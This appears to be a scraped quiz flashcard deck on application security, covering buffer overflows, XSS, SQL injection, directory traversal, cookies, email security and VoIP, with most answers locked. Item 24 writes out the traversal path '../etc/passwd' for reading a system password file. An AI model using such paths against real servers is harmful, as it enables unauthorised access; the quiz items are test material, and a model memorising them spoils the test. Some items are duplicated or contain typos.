Chat with AI
Deck 8: Application Security
Full screen (f)
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Question
Unlock Deck
Sign up to unlock the cards in this deck!
Unlock Deck
Unlock Deck
1/67
Play
Full screen (f)
Deck 8: Application Security
1
When a hacker is able to take over control of a host, nearly or completely, this indicates the hacker has ________.
A) super user privileges
B) system privileges
C) Session Initiation Protocol
D) Simple Network Management Protocol
A) super user privileges
B) system privileges
C) Session Initiation Protocol
D) Simple Network Management Protocol
super user privileges
2
Among the most widespread vulnerabilities in application programs are ________ vulnerabilities.
A) operating system
B) buffer overflow
C) root
D) PHP
A) operating system
B) buffer overflow
C) root
D) PHP
buffer overflow
3
Temporary areas in RAM are known as ________.
A) stacks
B) stack entries
C) returns
D) buffers
A) stacks
B) stack entries
C) returns
D) buffers
buffers
4
If an attacker enters more bytes into an area than it can accommodate, the extra is known as ________.
A) stack overflow
B) buffer overflow
C) overfiltering
D) a data buffer
A) stack overflow
B) buffer overflow
C) overfiltering
D) a data buffer
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
5
Microsoft's web-server software is the ________.
A) XSS
B) IIS
C) IPP
D) SQL
A) XSS
B) IIS
C) IPP
D) SQL
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
6
What is BugTraq?
A) A vulnerability tracking service
B) A virus
C) An application that runs on Windows
D) An antivirus program
A) A vulnerability tracking service
B) A virus
C) An application that runs on Windows
D) An antivirus program
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
7
In Microsoft Internet Explorer, the ________ allows users to begin to change their settings.
A) Tools menu
B) Action menu
C) Security tab of the Internet Options dialog box
D) Privacy tab of the Internet Options dialog box
A) Tools menu
B) Action menu
C) Security tab of the Internet Options dialog box
D) Privacy tab of the Internet Options dialog box
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
8
A danger of website programming is accidentally allowing ________.
A) IIS
B) IPP
C) XSS
D) SQL
A) IIS
B) IPP
C) XSS
D) SQL
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
9
________ is when one user's input can appear on the page of another user.
A) Login screen bypass
B) Cross-site scripting
C) An SQL query
D) SQL injection
A) Login screen bypass
B) Cross-site scripting
C) An SQL query
D) SQL injection
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
10
________ is an attack that involves sending modified SQL statements to a web application that will, in turn, modify a database.
A) Login screen bypass
B) Cross-site scripting
C) An SQL query
D) SQL injection
A) Login screen bypass
B) Cross-site scripting
C) An SQL query
D) SQL injection
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
11
________ is a computer language used to access and manage databases.
A) C
B) IIS
C) Ajax
D) SQL
A) C
B) IIS
C) Ajax
D) SQL
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
12
________ uses multiple technologies to create dynamic client-side applications.
A) Ajax
B) C
C) IPP
D) SQL
A) Ajax
B) C
C) IPP
D) SQL
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
13
A common type of buffer overflow is the stack overflow.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
14
The mechanics of vulnerabilities, exploits, and patches are substantially different for operating systems and applications.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
15
There are some programs that must run with root privileges.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
16
It is recommended that cryptographic system protections should not be used between the user and the application.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
17
An SQL statement uses the SELECT clause.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
18
The dynamic nature of Ajax makes it susceptible to malicious code injection.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
19
In Microsoft Windows, the native webserver program is ________.
A) Ajax
B) ISS
C) C
D) IPP
A) Ajax
B) ISS
C) C
D) IPP
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
20
In Microsoft Windows, the native webserver program is ________.
A) Ajax
B) ISS
C) C
D) IPP
A) Ajax
B) ISS
C) C
D) IPP
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
21
Apache and nginx are the two most widely used webserver programs on ________.
A) Windows 10
B) Unix
C) Linux
D) Linux and Unix
A) Windows 10
B) Unix
C) Linux
D) Linux and Unix
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
22
________ occurs when attackers take over a computer and produce false web pages.
A) Directory traversal attack
B) Mobile code
C) Cross-site scripting
D) Website defacement
A) Directory traversal attack
B) Mobile code
C) Cross-site scripting
D) Website defacement
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
23
Typing URLs with ________ in them can give access to sensitive directories.
A) ..
B) \
C) :\\
D) ::
A) ..
B) \
C) :\\
D) ::
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
24
With directory traversal, the path ________ would allow an attacker to download the passwd file in the etc directory (on a Unix computer).
A) /passwd
B) ../passwd
C) ../etc/passwd
D) ../root/passwd
A) /passwd
B) ../passwd
C) ../etc/passwd
D) ../root/passwd
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
25
What are Nikto, Paros Proxy, and Acunetix?
A) Webserver-specific vulnerability assessment tools
B) Directory traversal attackers
C) Mobile code tools
D) Website defacement tools
A) Webserver-specific vulnerability assessment tools
B) Directory traversal attackers
C) Mobile code tools
D) Website defacement tools
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
26
Numerous ________ errors indicate that a directory or file was not found.
A) 512
B) 500
C) 303
D) 404
A) 512
B) 500
C) 303
D) 404
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
27
Server-side programs should be created on ________.
A) development servers
B) testing servers
C) production servers
D) authentication servers
A) development servers
B) testing servers
C) production servers
D) authentication servers
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
28
Firms with rigorous deployment policies use all of the following EXCEPT ________ for that purpose.
A) development servers
B) testing servers
C) production servers
D) authentication servers
A) development servers
B) testing servers
C) production servers
D) authentication servers
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
29
After program or application creation, a program is moved to a(n) ________.
A) development server
B) testing server
C) production server
D) authentication server
A) development server
B) testing server
C) production server
D) authentication server
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
30
Webserver programs often have components that come from different companies.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
31
Attackers are rarely able to exploit vulnerabilities in custom programs.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
32
The UNICODE coding system can represent non-English languages.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
33
Websites do not typically have the ability to log responses of various error messages.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
34
After a program has been fully tested, it should be moved to a production server.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
35
An application proxy firewall sits between a webserver and the rest of a network.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
36
________ are small programs and are probably the safest because many attack-related actions are disabled.
A) Ajaxes
B) Java applets
C) Cookies
D) Stack entries
A) Ajaxes
B) Java applets
C) Cookies
D) Stack entries
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
37
________ can be used to track users at a website.
A) Stacks
B) Stack entries
C) Buffers
D) Cookies
A) Stacks
B) Stack entries
C) Buffers
D) Cookies
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
38
Which of the following is considered quite powerful and can do almost anything on the client machine?
A) JavaScript
B) Java
C) Active-X
D) VBScript
A) JavaScript
B) Java
C) Active-X
D) VBScript
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
39
Compared to full programming languages, scripts ________.
A) are more difficult to use than programming languages like Active-X
B) are easier to use than full programming languages
C) have similar protections to Java
D) are more difficult to use than programming languages like Java
A) are more difficult to use than programming languages like Active-X
B) are easier to use than full programming languages
C) have similar protections to Java
D) are more difficult to use than programming languages like Java
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
40
Which of the following was developed by Microsoft and was said to be safe due to cryptographically signed by the developer?
A) JavaScript
B) Active-X
C) Java
D) VBScript
A) JavaScript
B) Active-X
C) Java
D) VBScript
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
41
Which of the following is FALSE about cookies?
A) Some websites use cookies.
B) Antispyware programs cannot identify dangerous cookies.
C) They allow a website to track what pages you have visited.
D) Cookies can remember your login name and password to websites.
A) Some websites use cookies.
B) Antispyware programs cannot identify dangerous cookies.
C) They allow a website to track what pages you have visited.
D) Cookies can remember your login name and password to websites.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
42
In the Internet Options dialog box, the ________ tab lets you select security settings for general Internet websites.
A) Privacy
B) Advanced
C) Content
D) Security
A) Privacy
B) Advanced
C) Content
D) Security
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
43
In the Internet Options dialog box, the ________ tab lets you control what information is released to websites.
A) Privacy
B) Advanced
C) Content
D) Security
A) Privacy
B) Advanced
C) Content
D) Security
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
44
Under which of the following tabs in the Internet Options dialog box are cookies controlled?
A) Privacy
B) Advanced
C) Content
D) Security
A) Privacy
B) Advanced
C) Content
D) Security
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
45
The more popular scripting languages for mobile code are VBScript and JavaScript.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
46
Many websites require users to have Active-X turned on.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
47
What is the problem with image spam?
A) It takes up more bandwidth than traditional text spam.
B) It isn't detectible.
C) It is smaller and less detectible than traditional text spam.
D) It consumes less bandwidth and often can get past traditional spam detectors.
A) It takes up more bandwidth than traditional text spam.
B) It isn't detectible.
C) It is smaller and less detectible than traditional text spam.
D) It consumes less bandwidth and often can get past traditional spam detectors.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
48
________ is considered unsolicited commercial e-mail.
A) A cookie
B) A virus
C) Spam
D) A buffer
A) A cookie
B) A virus
C) Spam
D) A buffer
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
49
SSL/TLS provides security ________.
A) between an e-mail client and its mail server
B) between an authentication email and an e-mail client
C) only with suspicious e-mail
D) at the level of the PC
A) between an e-mail client and its mail server
B) between an authentication email and an e-mail client
C) only with suspicious e-mail
D) at the level of the PC
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
50
Which of the following provides end-to-end e-mail security?
A) PKI
B) PGP
C) ISS
D) S/MIME
A) PKI
B) PGP
C) ISS
D) S/MIME
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
51
Which of the following uses a circles of trust?
A) PKI
B) S/MIME
C) PGP
D) ISS
A) PKI
B) S/MIME
C) PGP
D) ISS
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
52
Many firms filter incoming e-mail messages and some filter outgoing messages as well.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
53
PGP has had most success in person-to-person communication without corporate control.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
54
Which of the following make up for two of UDP's biggest weaknesses?
A) IP headers
B) UDP headers
C) RTP headers
D) Circles of trust
A) IP headers
B) UDP headers
C) RTP headers
D) Circles of trust
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
55
VoIP is ________.
A) calling someone over a PSTN line
B) sending e-mail through the Internet
C) calling someone over the Internet
D) sending video over the Internet
A) calling someone over a PSTN line
B) sending e-mail through the Internet
C) calling someone over the Internet
D) sending video over the Internet
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
56
When someone speaks, a(n) ________ in the VoIP phone converts the voice into a stream of digital bytes.
A) codec
B) RTP header
C) buffer
D) TCP
A) codec
B) RTP header
C) buffer
D) TCP
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
57
VoIP voice transmission uses ________ to carry the digital voice data.
A) UDP
B) codecs
C) buffers
D) TCP
A) UDP
B) codecs
C) buffers
D) TCP
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
58
Which of the following is a signaling protocol?
A) VoIP
B) SIP
C) UDP
D) RTP
A) VoIP
B) SIP
C) UDP
D) RTP
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
59
SIP proxy servers are used primarily in ________.
A) RTP packets
B) signaling transmissions
C) transport transmissions
D) PSTN
A) RTP packets
B) signaling transmissions
C) transport transmissions
D) PSTN
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
60
In VoIP, encryption may ________.
A) increase jitter
B) reduce throughput
C) make traffic unreadable
D) increase latency
A) increase jitter
B) reduce throughput
C) make traffic unreadable
D) increase latency
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
61
Spam over IP telephony is called ________.
A) RFC
B) SPIT
C) INVITE
D) VPN
A) RFC
B) SPIT
C) INVITE
D) VPN
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
62
VoIP and the PSTN use different codecs.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
63
VoIP and the PSTN use different transport technology.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
64
A goal of VoIP is to provide convergence.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
65
Which of the following is NOT a supervisory protocol?
A) SNMP
B) ARP
C) OSPF
D) RTP
A) SNMP
B) ARP
C) OSPF
D) RTP
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
66
Presence servers allow three or more parties to locate each other.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
67
Corporate IM systems should use a presence server rather than a relay server.
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
Unlock Deck
k this deck
Unlock Deck
Unlock for access to all 67 flashcards in this deck.
